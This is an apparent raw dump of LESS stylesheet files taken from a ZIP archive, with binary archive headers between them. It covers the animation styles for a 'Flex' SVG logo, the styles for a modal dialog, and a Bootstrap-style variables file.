				  animation-delay: 3s;
				}
			}
			g#flex_logo  {
				
				polygon,#logo_top_bckg {
					stroke-width: 1;
					animation-duration: 0.7s;
					animation-delay: 4.5s;
				}
				
				path {
				  stroke-width: 7;
				  stroke: fade(white, 70%);
				  animation-duration: 2s;
				  animation-delay: 3s;
				  
				  
					&#logo_top {
					  stroke-width: 7;
					  stroke: fade(white, 70%);
					  animation-duration: 2.5s;
					  animation-delay: 2.6s;
					}
					&#logo_main1 {
					  animation-duration: 3s;
					  animation-delay: 3.6s;
					}
					&#logo_main2 {
					  animation-duration: 3s;
					  animation-delay: 4s;
					}
	
				}
			}
			
			g#flex {
				path {
					stroke-width: 8;
					
					&#f_top {
						stroke-width: 12;
						animation-duration: 2s;
						animation-delay: 5s;
					}
					
					&#f {
						animation-duration: 5s;
						animation-delay: 6s;
					}
					
					&#l {
						animation-duration: 1.5s;
						animation-delay: 6.7s;
					}
					&#e {
						animation-duration: 2s;
						animation-delay: 7s;
					}
					&#x {
						animation-duration: 2s;
						animation-delay: 7.4s;
					}
					
				}
			}
			
			g#flex_after {
				path {
				  animation-duration: 0.8s;
				  animation-delay: 9s;
				  
				  &#f_top {
					  animation-duration: 1s;
					  animation-delay: 7s;
					  animation-fill-mode: forwards;
					  animation-iteration-count: 1;
					}
				}
			}
		}	
	}



	/* default style */
	&.flex-logo-default {
			max-width: 400px;
			margin: 0 auto;
		  
			g#Background {
				path#flex_rectangle_fill {
					opacity: 0;
					fill: transparent;
					stroke-dasharray: 1200;
					stroke-dashoffset: 1200;
					animation-name: fade-in;
					animation-duration: 0.5s;
					animation-delay: 3s;
					stroke-width: 0;
					animation-name: fade-in;
					animation-fill-mode: forwards;
					animation-iteration-count: 1;
					animation-timing-function: linear;
				}
				path#flex_rectangle {
				  stroke: fade(black, 70%);
				  stroke-width: 7;
				  stroke-dasharray: 2800;
				  stroke-dashoffset: 2800;
				  opacity: 1;
				  animation-duration: 2.3s;
				  animation-delay: 1s;
				  animation-fill-mode: forwards;
				  animation-iteration-count: 1;
				  animation-name: show;
				  animation-timing-function: linear;
				}
			}
			g#flex_logo  {
				
				polygon {
					opacity:0;
					stroke-width: 1;
					animation-duration: 0.7s;
					animation-delay: 2.5s;
					animation-fill-mode: forwards;
					animation-iteration-count: 1;
					animation-name: gradient_fade;
					animation-timing-function: linear;
					
					&#gradient_1 {
				   		fill:fade(white, 80%);
					}
					&#gradient_2 {
						fill:fade(white, 92%);
					}
				}
				#logo_top_bckg {
					opacity:0;
					stroke-width: 1;
					animation-duration: 0.7s;
					animation-delay: 2.5s;
					animation-fill-mode: forwards;
					animation-iteration-count: 1;
					animation-name: gradient_fade;
					animation-timing-function: linear;
				}
				
				path {
				  stroke-width: 7;
				  stroke: fade(black, 70%);
				  opacity: 1;
				  stroke-dasharray: 1500;
				  stroke-dashoffset: 1500;
				  animation-duration: 2s;
				  animation-delay: 1s;
				  animation-fill-mode: forwards;
				  animation-iteration-count: 1;
				  animation-name: gradient_fade;
				  animation-timing-function: linear;
				  
				  
					&#logo_top {
					  stroke-width: 7;
					  stroke: fade(black, 70%);
					  stroke-dasharray: 2000;
					  stroke-dashoffset: 2000;
					  animation-duration: 2.5s;
					  animation-delay: 0.6s;
					}
					&#logo_main1 {
					  stroke-dasharray: 1500;
					  stroke-dashoffset: 1500;
					  animation-duration: 3s;
					  animation-delay: 1.6s;
					}
					&#logo_main2 {
					  stroke-dasharray: 1500;
					  stroke-dashoffset: 1500;
					  animation-duration: 3s;
					  animation-delay: 2s;
					}
	
				}
			}
			
			g#flex {
				path {
					stroke-width: 12;
					stroke: fade(black, 50%);
					animation-fill-mode: forwards;
					animation-iteration-count: 1;
					animation-name: draw;
					animation-timing-function: linear;
					
					&#f_top {
						stroke-width: 12;
						stroke-dasharray: 700;
						stroke-dashoffset: 700;
						animation-duration: 2s;
						animation-delay: 3s;
					}
					
					&#f {
						stroke-dasharray: 2810;
						stroke-dashoffset: 2810;
						animation-duration: 5s;
						animation-delay: 4s;
					}
					
					&#l {
						stroke-dasharray: 900;
						stroke-dashoffset: 900;
						animation-duration: 1.5s;
						animation-delay: 4.7s;
					}
					&#e {
						stroke-dasharray: 1500;
						stroke-dashoffset: 1500;
						animation-duration: 2s;
						animation-delay: 5s;
					}
					&#x {
						stroke-dasharray: 1500;
						stroke-dashoffset: 1500;
						animation-duration: 2s;
						animation-delay: 5.4s;
					}
					
				}
			}
			
		g#flex_after {
			path {
			  stroke-width:0;
			  opacity:0;
			  fill: transparent;
			  animation-duration: 0.8s;
			  animation-delay: 7s;
			  animation-fill-mode: forwards;
			  animation-iteration-count: 1;
			  animation-name: flex_after_fade_default;
			  animation-timing-function: linear;
			  
			  &#f_top {
				  fill: transparent;
				  animation-duration: 1s;
				  animation-delay: 8s;
				  animation-fill-mode: forwards;
				  animation-iteration-count: 2;
				  animation-name: flex_after_f_top;
				  animation-timing-function: ease-in-out;
				}
			}
		}
		/* delayed 2 sec */
		&.delayed {
			
			g#Background {
				path#flex_rectangle_fill {
					animation-duration: 0.5s;
					animation-delay: 5s;
					stroke-width: 0;
				}
				path#flex_rectangle {
				  stroke-width: 7;
				  animation-duration: 2.3s;
				  animation-delay: 3s;
				}
			}
			g#flex_logo  {
				
				polygon,#logo_top_bckg {
					stroke-width: 1;
					animation-duration: 0.7s;
					animation-delay: 4.5s;
				}
				
				path {
				  stroke-width: 7;
				  stroke: fade(black, 70%);
				  animation-duration: 2s;
				  animation-delay: 3s;
				  
				  
					&#logo_top {
					  stroke-width: 7;
					  stroke: fade(black, 70%);
					  animation-duration: 2.5s;
					  animation-delay: 2.6s;
					}
					&#logo_main1 {
					  animation-duration: 3s;
					  animation-delay: 3.6s;
					}
					&#logo_main2 {
					  animation-duration: 3s;
					  animation-delay: 4s;
					}
	
				}
			}
			
			g#flex {
				path {
					stroke-width: 8;
					
					&#f_top {
						stroke-width: 12;
						animation-duration: 2s;
						animation-delay: 5s;
					}
					
					&#f {
						animation-duration: 5s;
						animation-delay: 6s;
					}
					
					&#l {
						animation-duration: 1.5s;
						animation-delay: 6.7s;
					}
					&#e {
						animation-duration: 2s;
						animation-delay: 7s;
					}
					&#x {
						animation-duration: 2s;
						animation-delay: 7.4s;
					}
					
				}
			}
			
			g#flex_after {
				path {
				  animation-duration: 0.8s;
				  animation-delay: 9s;
				  
				  &#f_top {
					  animation-duration: 1s;
					  animation-delay: 7s;
					  animation-fill-mode: forwards;
					  animation-iteration-count: 1;
					}
				}
			}
		}
	}
}


@keyframes draw {
  to {
    stroke-dashoffset: 0;
	stroke-width:4;
	opacity:1;
  }
}
@keyframes show {
  to {
    opacity: 1;
	stroke-dashoffset: 0;
	stroke-width: 0;
  }
}
@keyframes fade-in {
  to {
    opacity: 1;
	fill:fade(@major_color, 90%);
	stroke-dashoffset:0;
	stroke-width: 0;
  }
}
@keyframes gradient_fade {
  to {
    opacity: 1;
	stroke-dashoffset:0;
	stroke-width: 0;
  }
}
@keyframes flex_after_fade_default {
  to {
    opacity: 1;
	stroke-width:0;
	stroke-dashoffset:0;
	fill:fade(@gray, 70%);
	stroke:fade(@gray, 70%);
  }
}
@keyframes flex_after_fade_light {
  to {
    opacity: 1;
	stroke-width:0;
	stroke-dashoffset:0;
	fill:fade(white, 60%);
	stroke:fade(white, 50%);
  }
}
@keyframes flex_after_f_top {
  to {
    opacity: 1;
	stroke-width:5;
	stroke-dashoffset:0;
	fill:fade(@major_color, 85%);
	stroke:@major_color;
  }
}
PK!2�s�FFflex/less/flex-modal.lessnu&1i�
.flex-modal {
	
	display: none; /* Hidden by default */
	position: fixed; /* Stay in place */
	z-index: 10091; /* Sit on top */
	padding:0;
	top: 0;
	left: 0;
	outline:0;
	margin: auto;
	width: 100vw; /* Full width */
	height: 100vh; /* Full height */
	overflow: auto; /* Enable scroll if needed */
	color:@text_color;
	
	&.open-modal {
		display: block;
		-webkit-transform: translate3d(0,0,0);
		transform: translate3d(0,0,0);
		transform-style: preserve-3d;
		-webkit-backface-visibility: hidden;
		-webkit-animation: simple-fade .5s ease forwards;
		animation: simple-fade .5s ease forwards;
		background: rgba(0,0,0,0.35);
		
		/* Backdrop filter added in Flex 3.9.3 */
		-webkit-backdrop-filter: blur(0.1em) opacity(95%);
		backdrop-filter: blur(0.1em) opacity(95%);
		
		/* Modal Content */
		.flex-modal-content {
			
			background-color: #fff;
			width:600px;
			margin: auto;
			padding:30px;
			border:0;
			outline:0;
			overflow:hidden; /* fix for parent border-radius */
			border-radius:7px;
			box-shadow: 0 4px 10px 0 rgba(0,0,0,0.2),0 6px 55px 0 rgba(0,0,0,0.25); 
			-webkit-animation: zoom_modal 1s ease forwards;
			animation: zoom_modal 1s ease forwards;
			transform-style: preserve-3d;
			top: 15vh;
			
				.flex-modal-body {
					padding:20px;
					margin:0;
					width:100%;
					height:100%;
					outline:0;
					clear:both;
					display:block;
					overflow:hidden;
					
					.pretext, .posttext {
						text-align:left;
					}
				}
				
				.flex-modal-body .tm-img-wrapper > .img-responsive {
					display:block;
					width: 100%;
					height:100%;
					margin:auto;
					padding:0;
					outline:none;
					object-fit: cover;
				}
				
				.flex-modal-header,
				.flex-modal-footer {
					padding:10px 20px;
					margin:0;
					clear:both;
					display:block;
				}
				
				
				.flex-modal-header::after,
				.flex-modal-footer::after {
					clear: both;
					content: "";
					display: table;
				}
				
				&::after {
					clear: both;
					content: "";
					display: table;
				}
				
		}
		
	}
	
}


/* The Close Button */
.fm-close {
	position:absolute;
	z-index:9;
	display:block;
	right:0;
	top:0;
	width:55px;
	height:50px;
	background:transparent;
	margin:0;
	padding:0;
	border:none;
	outline:0;
	float: right;
	font-size: 38px;
	line-height: 38px;
	font-weight: bold;
}

.fm-close:hover,
.fm-close:focus {
	color: #777;
	text-decoration: none;
	cursor: pointer;
}
@media (max-width: @screen-sm) {
	.flex-modal {
		
		.flex-modal-content {
			width:80%;
			padding:25px 12px 30px;
	
		}
	}
}

@media (max-width: @screen-xs) {
    .flex-modal {
		padding: 2vh 0;
		
		.flex-modal-content {
			width:85%;
			padding:15px 5px 30px;
			top:10vh;
	
		}
	}
	
}

@-webkit-keyframes simple-fade {
  0% {
    opacity: 0;
	visibility:hidden;
  }
  100% {
    opacity: 1;
	visibility:visible;
  }
}
@keyframes simple-fade {
  0% {
    opacity: 0;
	visibility:hidden;
  }
  100% {
    opacity: 1;
	visibility:visible;
  }
}

@-webkit-keyframes zoom_modal {
  0% {
	-webkit-transform: translate3d(0,-100px,0) scale(0.7) perspective(700px) rotateX(20deg);
    transform: translate3d(0,-100px,0) scale(0.7) perspective(700px) rotateX(20deg);
  }
  40% {
    -webkit-transform: translate3d(0,7px,0) scale(1.015);
    transform: translate3d(0,7px,0) scale(1.015);
  }
  80% {
    -webkit-transform: perspective(1000px) rotateX(0deg);
    transform: perspective(1000px) rotateX(0deg);
  }
  100% {
    -webkit-transform: translate3d(0,0,0) scale(1.0001);
    transform: translate3d(0,0,0) scale(1.0001);
  }
}
@keyframes zoom_modal {
  0% {
	-webkit-transform: translate3d(0,-100px,0) scale(0.7) perspective(700px) rotateX(20deg);
    transform: translate3d(0,-100px,0) scale(0.7) perspective(700px) rotateX(20deg);
  }
  40% {
    -webkit-transform: translate3d(0,7px,0) scale(1.015);
    transform: translate3d(0,7px,0) scale(1.015);
  }
  80% {
    -webkit-transform: perspective(1000px) rotateX(0deg);
    transform: perspective(1000px) rotateX(0deg);
  }
  100% {
    -webkit-transform: translate3d(0,0,0) scale(1.0001);
    transform: translate3d(0,0,0) scale(1.0001);
  }
}

@media (max-width: @screen-sm) {
	.flex-modal {
		&.open-modal{
			.flex-modal-content {
				width: 80%;
				top: 10%;
				padding:30px 15px;
			}
		}
	}
}
@media (max-width: @screen-xs) {
	.flex-modal {
		&.open-modal{
			.flex-modal-content {
				width: 85%;
				top: 8%;
				padding:30px 10px;
			}
		}
	}
}PK!8�h�hflex/less/variables.lessnu&1i�//
// Variables
// --------------------------------------------------


//== Colors
//
//## Gray and brand colors for use across Bootstrap.

@gray-base:              #000;
@gray-darker:            lighten(@gray-base, 13.5%); // #222
@gray-dark:              lighten(@gray-base, 20%);   // #333
@gray:                   lighten(@gray-base, 33.5%); // #555
@gray-light:             lighten(@gray-base, 46.7%); // #777
@gray-lighter:           lighten(@gray-base, 93.5%); // #eee

@brand-primary:         darken(#428bca, 6.5%);
@brand-success:         #5cb85c;
@brand-info:            #5bc0de;
@brand-warning:         #f0ad4e;
@brand-danger:          #d9534f;


//== Scaffolding
//
//## Settings for some of the most global styles.

//** Background color for `<body>`.
@body-bg:               #fff;
//** Global text color on `<body>`.
@text-color:            @gray-dark;

//** Global textual link color.
@link-color:            @brand-primary;
//** Link hover color set via `darken()` function.
@link-hover-color:      darken(@link-color, 15%);
//** Link hover decoration.
@link-hover-decoration: underline;


//== Typography
//
//## Font, line-height, and color for body text, headings, and more.

@font-family-sans-serif:  "Helvetica Neue", Helvetica, Arial, sans-serif;
@font-family-serif:       Georgia, "Times New Roman", Times, serif;
//** Default monospace fonts for `<code>`, `<kbd>`, and `<pre>`.
@font-family-monospace:   Menlo, Monaco, Consolas, "Courier New", monospace;
@font-family-base:        @font-family-sans-serif;

@font-size-base:          14px;
@font-size-large:         ceil((@font-size-base * 1.25)); // ~18px
@font-size-small:         ceil((@font-size-base * 0.85)); // ~12px

@font-size-h1:            floor((@font-size-base * 2.6)); // ~36px
@font-size-h2:            floor((@font-size-base * 2.15)); // ~30px
@font-size-h3:            ceil((@font-size-base * 1.7)); // ~24px
@font-size-h4:            ceil((@font-size-base * 1.25)); // ~18px
@font-size-h5:            @font-size-base;
@font-size-h6:            ceil((@font-size-base * 0.85)); // ~12px

//** Unit-less `line-height` for use in components like buttons.
@line-height-base:        1.428571429; // 20/14
//** Computed "line-height" (`font-size` * `line-height`) for use with `margin`, `padding`, etc.
@line-height-computed:    floor((@font-size-base * @line-height-base)); // ~20px

//** By default, this inherits from the `<body>`.
@headings-font-family:    inherit;
@headings-font-weight:    500;
@headings-line-height:    1.1;
@headings-color:          inherit;


//== Iconography
//
//## Specify custom location and filename of the included Glyphicons icon font. Useful for those including Bootstrap via Bower.

//** Load fonts from this directory.
@icon-font-path:          "../fonts/";
//** File name for all font files.
@icon-font-name:          "glyphicons-halflings-regular";
//** Element ID within SVG icon file.
@icon-font-svg-id:        "glyphicons_halflingsregular";


//== Components
//
//## Define common padding and border radius sizes and more. Values based on 14px text and 1.428 line-height (~20px to start).

@padding-base-vertical:     6px;
@padding-base-horizontal:   12px;

@padding-large-vertical:    10px;
@padding-large-horizontal:  16px;

@padding-small-vertical:    5px;
@padding-small-horizontal:  10px;

@padding-xs-vertical:       1px;
@padding-xs-horizontal:     5px;

@line-height-large:         1.33;
@line-height-small:         1.5;

@border-radius-base:        4px;
@border-radius-large:       6px;
@border-radius-small:       3px;

//** Global color for active items (e.g., navs or dropdowns).
@component-active-color:    #fff;
//** Global background color for active items (e.g., navs or dropdowns).
@component-active-bg:       @brand-primary;

//** Width of the `border` for generating carets that indicator dropdowns.
@caret-width-base:          4px;
//** Carets increase slightly in size for larger components.
@caret-width-large:         5px;


//== Tables
//
//## Customizes the `.table` component with basic values, each used across all table variations.

//** Padding for `<th>`s and `<td>`s.
@table-cell-padding:            8px;
//** Padding for cells in `.table-condensed`.
@table-condensed-cell-padding:  5px;

//** Default background color used for all tables.
@table-bg:                      transparent;
//** Background color used for `.table-striped`.
@table-bg-accent:               #f9f9f9;
//** Background color used for `.table-hover`.
@table-bg-hover:                #f5f5f5;
@table-bg-active:               @table-bg-hover;

//** Border color for table and cell borders.
@table-border-color:            #ddd;


//== Buttons
//
//## For each of Bootstrap's buttons, define text, background and border color.

@btn-font-weight:                normal;

@btn-default-color:              #333;
@btn-default-bg:                 #fff;
@btn-default-border:             #ccc;

@btn-primary-color:              #fff;
@btn-primary-bg:                 @brand-primary;
@btn-primary-border:             darken(@btn-primary-bg, 5%);

@btn-success-color:              #fff;
@btn-success-bg:                 @brand-success;
@btn-success-border:             darken(@btn-success-bg, 5%);

@btn-info-color:                 #fff;
@btn-info-bg:                    @brand-info;
@btn-info-border:                darken(@btn-info-bg, 5%);

@btn-warning-color:              #fff;
@btn-warning-bg:                 @brand-warning;
@btn-warning-border:             darken(@btn-warning-bg, 5%);

@btn-danger-color:               #fff;
@btn-danger-bg:                  @brand-danger;
@btn-danger-border:              darken(@btn-danger-bg, 5%);

@btn-link-disabled-color:        @gray-light;


//== Forms
//
//##

//** `<input>` background color
@input-bg:                       #fff;
//** `<input disabled>` background color
@input-bg-disabled:              @gray-lighter;

//** Text color for `<input>`s
@input-color:                    @gray;
//** `<input>` border color
@input-border:                   #ccc;

// TODO: Rename `@input-border-radius` to `@input-border-radius-base` in v4
//** Default `.form-control` border radius
@input-border-radius:            @border-radius-base;
//** Large `.form-control` border radius
@input-border-radius-large:      @border-radius-large;
//** Small `.form-control` border radius
@input-border-radius-small:      @border-radius-small;

//** Border color for inputs on focus
@input-border-focus:             #66afe9;

//** Placeholder text color
@input-color-placeholder:        #999;

//** Default `.form-control` height
@input-height-base:              (@line-height-computed + (@padding-base-vertical * 2) + 2);
//** Large `.form-control` height
@input-height-large:             (ceil(@font-size-large * @line-height-large) + (@padding-large-vertical * 2) + 2);
//** Small `.form-control` height
@input-height-small:             (floor(@font-size-small * @line-height-small) + (@padding-small-vertical * 2) + 2);

@legend-color:                   @gray-dark;
@legend-border-color:            #e5e5e5;

//** Background color for textual input addons
@input-group-addon-bg:           @gray-lighter;
//** Border color for textual input addons
@input-group-addon-border-color: @input-border;

//** Disabled cursor for form controls and buttons.
@cursor-disabled:                not-allowed;


//== Dropdowns
//
//## Dropdown menu container and contents.

//** Background for the dropdown menu.
@dropdown-bg:                    #fff;
//** Dropdown menu `border-color`.
@dropdown-border:                rgba(0,0,0,.15);
//** Dropdown menu `border-color` **for IE8**.
@dropdown-fallback-border:       #ccc;
//** Divider color for between dropdown items.
@dropdown-divider-bg:            #e5e5e5;

//** Dropdown link text color.
@dropdown-link-color:            @gray-dark;
//** Hover color for dropdown links.
@dropdown-link-hover-color:      darken(@gray-dark, 5%);
//** Hover background for dropdown links.
@dropdown-link-hover-bg:         #f5f5f5;

//** Active dropdown menu item text color.
@dropdown-link-active-color:     @component-active-color;
//** Active dropdown menu item background color.
@dropdown-link-active-bg:        @component-active-bg;

//** Disabled dropdown menu item background color.
@dropdown-link-disabled-color:   @gray-light;

//** Text color for headers within dropdown menus.
@dropdown-header-color:          @gray-light;

//** Deprecated `@dropdown-caret-color` as of v3.1.0
@dropdown-caret-color:           #000;


//-- Z-index master list
//
// Warning: Avoid customizing these values. They're used for a bird's eye view
// of components dependent on the z-axis and are designed to all work together.
//
// Note: These variables are not generated into the Customizer.

@zindex-navbar:            1000;
@zindex-dropdown:          1000;
@zindex-popover:           1060;
@zindex-tooltip:           1070;
@zindex-navbar-fixed:      1030;
@zindex-modal:             1040;


//== Media queries breakpoints
//
//## Define the breakpoints at which your layout will change, adapting to different screen sizes.

// Extra small screen / phone
//** Deprecated `@screen-xs` as of v3.0.1
@screen-xs:                  480px;
//** Deprecated `@screen-xs-min` as of v3.2.0
@screen-xs-min:              @screen-xs;
//** Deprecated `@screen-phone` as of v3.0.1
@screen-phone:               @screen-xs-min;

// Small screen / tablet
//** Deprecated `@screen-sm` as of v3.0.1
@screen-sm:                  768px;
@screen-sm-min:              @screen-sm;
//** Deprecated `@screen-tablet` as of v3.0.1
@screen-tablet:              @screen-sm-min;

// Medium screen / desktop
//** Deprecated `@screen-md` as of v3.0.1
@screen-md:                  992px;
@screen-md-min:              @screen-md;
//** Deprecated `@screen-desktop` as of v3.0.1
@screen-desktop:             @screen-md-min;

// Large screen / wide desktop
//** Deprecated `@screen-lg` as of v3.0.1
@screen-lg:                  1200px;
@screen-lg-min:              @screen-lg;
//** Deprecated `@screen-lg-desktop` as of v3.0.1
@screen-lg-desktop:          @screen-lg-min;

// So media queries don't overlap when required, provide a maximum
@screen-xs-max:              (@screen-sm-min - 1);
@screen-sm-max:              (@screen-md-min - 1);
@screen-md-max:              (@screen-lg-min - 1);


//== Grid system
//
//## Define your custom responsive grid.

//** Number of columns in the grid.
@grid-columns:              12;
//** Padding between columns. Gets divided in half for the left and right.
@grid-gutter-width:         30px;
// Navbar collapse
//** Point at which the navbar becomes uncollapsed.
@grid-float-breakpoint:     @screen-sm-min;
//** Point at which the navbar begins collapsing.
@grid-float-breakpoint-max: (@grid-float-breakpoint - 1);


//== Container sizes
//
//## Define the maximum width of `.container` for different screen sizes.

// Small screen / tablet
@container-tablet:             (720px + @grid-gutter-width);
//** For `@screen-sm-min` and up.
@container-sm:                 @container-tablet;

// Medium screen / desktop
@container-desktop:            (940px + @grid-gutter-width);
//** For `@screen-md-min` and up.
@container-md:                 @container-desktop;

// Large screen / wide desktop
@container-large-desktop:      (1140px + @grid-gutter-width);
//** For `@screen-lg-min` and up.
@container-lg:                 @container-large-desktop;


//== Navbar
//
//##

// Basics of a navbar
@navbar-height:                    50px;
@navbar-margin-bottom:             @line-height-computed;
@navbar-border-radius:             @border-radius-base;
@navbar-padding-horizontal:        floor((@grid-gutter-width / 2));
@navbar-padding-vertical:          ((@navbar-height - @line-height-computed) / 2);
@navbar-collapse-max-height:       340px;

@navbar-default-color:             #777;
@navbar-default-bg:                #f8f8f8;
@navbar-default-border:            darken(@navbar-default-bg, 6.5%);

// Navbar links
@navbar-default-link-color:                #777;
@navbar-default-link-hover-color:          #333;
@navbar-default-link-hover-bg:             transparent;
@navbar-default-link-active-color:         #555;
@navbar-default-link-active-bg:            darken(@navbar-default-bg, 6.5%);
@navbar-default-link-disabled-color:       #ccc;
@navbar-default-link-disabled-bg:          transparent;

// Navbar brand label
@navbar-default-brand-color:               @navbar-default-link-color;
@navbar-default-brand-hover-color:         darken(@navbar-default-brand-color, 10%);
@navbar-default-brand-hover-bg:            transparent;

// Navbar toggle
@navbar-default-toggle-hover-bg:           #ddd;
@navbar-default-toggle-icon-bar-bg:        #888;
@navbar-default-toggle-border-color:       #ddd;


// Inverted navbar
// Reset inverted navbar basics
@navbar-inverse-color:                      lighten(@gray-light, 15%);
@navbar-inverse-bg:                         #222;
@navbar-inverse-border:                     darken(@navbar-inverse-bg, 10%);

// Inverted navbar links
@navbar-inverse-link-color:                 lighten(@gray-light, 15%);
@navbar-inverse-link-hover-color:           #fff;
@navbar-inverse-link-hover-bg:              transparent;
@navbar-inverse-link-active-color:          @navbar-inverse-link-hover-color;
@navbar-inverse-link-active-bg:             darken(@navbar-inverse-bg, 10%);
@navbar-inverse-link-disabled-color:        #444;
@navbar-inverse-link-disabled-bg:           transparent;

// Inverted navbar brand label
@navbar-inverse-brand-color:                @navbar-inverse-link-color;
@navbar-inverse-brand-hover-color:          #fff;
@navbar-inverse-brand-hover-bg:             transparent;

// Inverted navbar toggle
@navbar-inverse-toggle-hover-bg:            #333;
@navbar-inverse-toggle-icon-bar-bg:         #fff;
@navbar-inverse-toggle-border-color:        #333;


//== Navs
//
//##

//=== Shared nav styles
@nav-link-padding:                          10px 15px;
@nav-link-hover-bg:                         @gray-lighter;

@nav-disabled-link-color:                   @gray-light;
@nav-disabled-link-hover-color:             @gray-light;

//== Tabs
@nav-tabs-border-color:                     #ddd;

@nav-tabs-link-hover-border-color:          @gray-lighter;

@nav-tabs-active-link-hover-bg:             @body-bg;
@nav-tabs-active-link-hover-color:          @gray;
@nav-tabs-active-link-hover-border-color:   #ddd;

@nav-tabs-justified-link-border-color:            #ddd;
@nav-tabs-justified-active-link-border-color:     @body-bg;

//== Pills
@nav-pills-border-radius:                   @border-radius-base;
@nav-pills-active-link-hover-bg:            @component-active-bg;
@nav-pills-active-link-hover-color:         @component-active-color;


//== Pagination
//
//##

@pagination-color:                     @link-color;
@pagination-bg:                        #fff;
@pagination-border:                    #ddd;

@pagination-hover-color:               @link-hover-color;
@pagination-hover-bg:                  @gray-lighter;
@pagination-hover-border:              #ddd;

@pagination-active-color:              #fff;
@pagination-active-bg:                 @brand-primary;
@pagination-active-border:             @brand-primary;

@pagination-disabled-color:            @gray-light;
@pagination-disabled-bg:               #fff;
@pagination-disabled-border:           #ddd;


//== Pager
//
//##

@pager-bg:                             @pagination-bg;
@pager-border:                         @pagination-border;
@pager-border-radius:                  15px;

@pager-hover-bg:                       @pagination-hover-bg;

@pager-active-bg:                      @pagination-active-bg;
@pager-active-color:                   @pagination-active-color;

@pager-disabled-color:                 @pagination-disabled-color;


//== Jumbotron
//
//##

@jumbotron-padding:              30px;
@jumbotron-color:                inherit;
@jumbotron-bg:                   @gray-lighter;
@jumbotron-heading-color:        inherit;
@jumbotron-font-size:            ceil((@font-size-base * 1.5));


//== Form states and alerts
//
//## Define colors for form feedback states and, by default, alerts.

@state-success-text:             #3c763d;
@state-success-bg:               #dff0d8;
@state-success-border:           darken(spin(@state-success-bg, -10), 5%);

@state-info-text:                #31708f;
@state-info-bg:                  #d9edf7;
@state-info-border:              darken(spin(@state-info-bg, -10), 7%);

@state-warning-text:             #8a6d3b;
@state-warning-bg:               #fcf8e3;
@state-warning-border:           darken(spin(@state-warning-bg, -10), 5%);

@state-danger-text:              #a94442;
@state-danger-bg:                #f2dede;
@state-danger-border:            darken(spin(@state-danger-bg, -10), 5%);


//== Tooltips
//
//##

//** Tooltip max width
@tooltip-max-width:           200px;
//** Tooltip text color
@tooltip-color:               #fff;
//** Tooltip background color
@tooltip-bg:                  #000;
@tooltip-opacity:             .9;

//** Tooltip arrow width
@tooltip-arrow-width:         5px;
//** Tooltip arrow color
@tooltip-arrow-color:         @tooltip-bg;


//== Popovers
//
//##

//** Popover body background color
@popover-bg:                          #fff;
//** Popover maximum width
@popover-max-width:                   276px;
//** Popover border color
@popover-border-color:                rgba(0,0,0,.2);
//** Popover fallback border color
@popover-fallback-border-color:       #ccc;

//** Popover title background color
@popover-title-bg:                    darken(@popover-bg, 3%);

//** Popover arrow width
@popover-arrow-width:                 10px;
//** Popover arrow color
@popover-arrow-color:                 @popover-bg;

//** Popover outer arrow width
@popover-arrow-outer-width:           (@popover-arrow-width + 1);
//** Popover outer arrow color
@popover-arrow-outer-color:           fadein(@popover-border-color, 5%);
//** Popover outer arrow fallback color
@popover-arrow-outer-fallback-color:  darken(@popover-fallback-border-color, 20%);


//== Labels
//
//##

//** Default label background color
@label-default-bg:            @gray-light;
//** Primary label background color
@label-primary-bg:            @brand-primary;
//** Success label background color
@label-success-bg:            @brand-success;
//** Info label background color
@label-info-bg:               @brand-info;
//** Warning label background color
@label-warning-bg:            @brand-warning;
//** Danger label background color
@label-danger-bg:             @brand-danger;

//** Default label text color
@label-color:                 #fff;
//** Default text color of a linked label
@label-link-hover-color:      #fff;


//== Modals
//
//##

//** Padding applied to the modal body
@modal-inner-padding:         15px;

//** Padding applied to the modal title
@modal-title-padding:         15px;
//** Modal title line-height
@modal-title-line-height:     @line-height-base;

//** Background color of modal content area
@modal-content-bg:                             #fff;
//** Modal content border color
@modal-content-border-color:                   rgba(0,0,0,.2);
//** Modal content border color **for IE8**
@modal-content-fallback-border-color:          #999;

//** Modal backdrop background color
@modal-backdrop-bg:           #000;
//** Modal backdrop opacity
@modal-backdrop-opacity:      .5;
//** Modal header border color
@modal-header-border-color:   #e5e5e5;
//** Modal footer border color
@modal-footer-border-color:   @modal-header-border-color;

@modal-lg:                    900px;
@modal-md:                    600px;
@modal-sm:                    300px;


//== Alerts
//
//## Define alert colors, border radius, and padding.

@alert-padding:               15px;
@alert-border-radius:         @border-radius-base;
@alert-link-font-weight:      bold;

@alert-success-bg:            @state-success-bg;
@alert-success-text:          @state-success-text;
@alert-success-border:        @state-success-border;

@alert-info-bg:               @state-info-bg;
@alert-info-text:             @state-info-text;
@alert-info-border:           @state-info-border;

@alert-warning-bg:            @state-warning-bg;
@alert-warning-text:          @state-warning-text;
@alert-warning-border:        @state-warning-border;

@alert-danger-bg:             @state-danger-bg;
@alert-danger-text:           @state-danger-text;
@alert-danger-border:         @state-danger-border;


//== Progress bars
//
//##

//** Background color of the whole progress component
@progress-bg:                 #f5f5f5;
//** Progress bar text color
@progress-bar-color:          #fff;
//** Variable for setting rounded corners on progress bar.
@progress-border-radius:      @border-radius-base;

//** Default progress bar color
@progress-bar-bg:             @brand-primary;
//** Success progress bar color
@progress-bar-success-bg:     @brand-success;
//** Warning progress bar color
@progress-bar-warning-bg:     @brand-warning;
//** Danger progress bar color
@progress-bar-danger-bg:      @brand-danger;
//** Info progress bar color
@progress-bar-info-bg:        @brand-info;


//== List group
//
//##

//** Background color on `.list-group-item`
@list-group-bg:                 #fff;
//** `.list-group-item` border color
@list-group-border:             #ddd;
//** List group border radius
@list-group-border-radius:      @border-radius-base;

//** Background color of single list items on hover
@list-group-hover-bg:           #f5f5f5;
//** Text color of active list items
@list-group-active-color:       @component-active-color;
//** Background color of active list items
@list-group-active-bg:          @component-active-bg;
//** Border color of active list elements
@list-group-active-border:      @list-group-active-bg;
//** Text color for content within active list items
@list-group-active-text-color:  lighten(@list-group-active-bg, 40%);

//** Text color of disabled list items
@list-group-disabled-color:      @gray-light;
//** Background color of disabled list items
@list-group-disabled-bg:         @gray-lighter;
//** Text color for content within disabled list items
@list-group-disabled-text-color: @list-group-disabled-color;

@list-group-link-color:         #555;
@list-group-link-hover-color:   @list-group-link-color;
@list-group-link-heading-color: #333;


//== Panels
//
//##

@panel-bg:                    #fff;
@panel-body-padding:          15px;
@panel-heading-padding:       10px 15px;
@panel-footer-padding:        @panel-heading-padding;
@panel-border-radius:         @border-radius-base;

//** Border color for elements within panels
@panel-inner-border:          #ddd;
@panel-footer-bg:             #f5f5f5;

@panel-default-text:          @gray-dark;
@panel-default-border:        #ddd;
@panel-default-heading-bg:    #f5f5f5;

